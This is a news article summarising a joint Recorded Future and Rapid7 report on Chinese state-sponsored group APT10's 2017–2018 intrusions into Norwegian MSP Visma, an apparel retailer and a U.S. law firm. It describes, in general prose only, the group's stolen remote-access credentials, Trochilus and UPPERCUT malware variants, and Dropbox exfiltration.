Computer plate and flag of China
Computer plate and flag of China

The Chinese state-sponsored threat actor APT10 used stolen remote access software credentials to infiltrate the network of Norwegian managed services provider Visma last year, likely in an effort to launch secondary attacks against the MSP’s clients.

An investigation into the cyber espionage campaign revealed that APT10, aka Stone Panda, used similar tactics to invade the networks of at least two other companies – an international apparel retailer and a U.S.-based law firm with a specialization in intellectual property law.

Researchers with Recorded Future’s Insikt Group as well as Rapid7 divulged details of the plot today in a jointly authored blog post and analysis report.

The trio of organizations were separately attacked between November 2017 and September 2018. In all three cases, the malicious actors initially accessed the companies’ networks using valid stolen passwords for either Citrix or LogMeIn. They then enumerated access and elevated their privilege before using DLL sideloading techniques (a common m.o. of APT10) to deliver malware.

Visma was infected by a newly discovered version of the Trochilus remote access trojan. Normally, the RAT encrypts its command-and-control communications using an RC4 stream cipher, but this latest version uses a combination of XOR, RC4 and Salsa20, the analysis explains. Meanwhile, the other two victimized networks were struck with a newly observed version of the UPPERCUT (ANEL) backdoor malware program. Recorded Future and Rapid7 note that APT10 has a history of using Trochilus and UPPERCUT has been linked exclusively to the group.

The hackers also used Mimikatz to conduct credential theft and exfiltrated key data from their victims via a Dropbox account, using the cURL for Windows command-line tool.

Run by China’s Ministry of State Security intelligence agency, APT10 is well known for attacking MSPs and their clients, particularly in a campaign launched in early 2017 called Operation Cloud Hopper.

“Access to the networks of these third-party service providers grants the MSS the ability to potentially access the networks of hundreds, if not thousands, of corporations around the world,” the blog post states. “We assess that APT10 likely compromised Visma with the primary goal of enabling secondary intrusions onto their client networks, and not of stealing Visma intellectual property.”

Just last December, the U.S. Department of Justice charged alleged MSS-sponsored hackers Zhu Hua and Zhang Shilong for multiple computer intrusions resulting in intellectual property theft.

“We believe APT10 is the most significant Chinese state-sponsored cyber threat to global corporations known to date,” the blog post declares.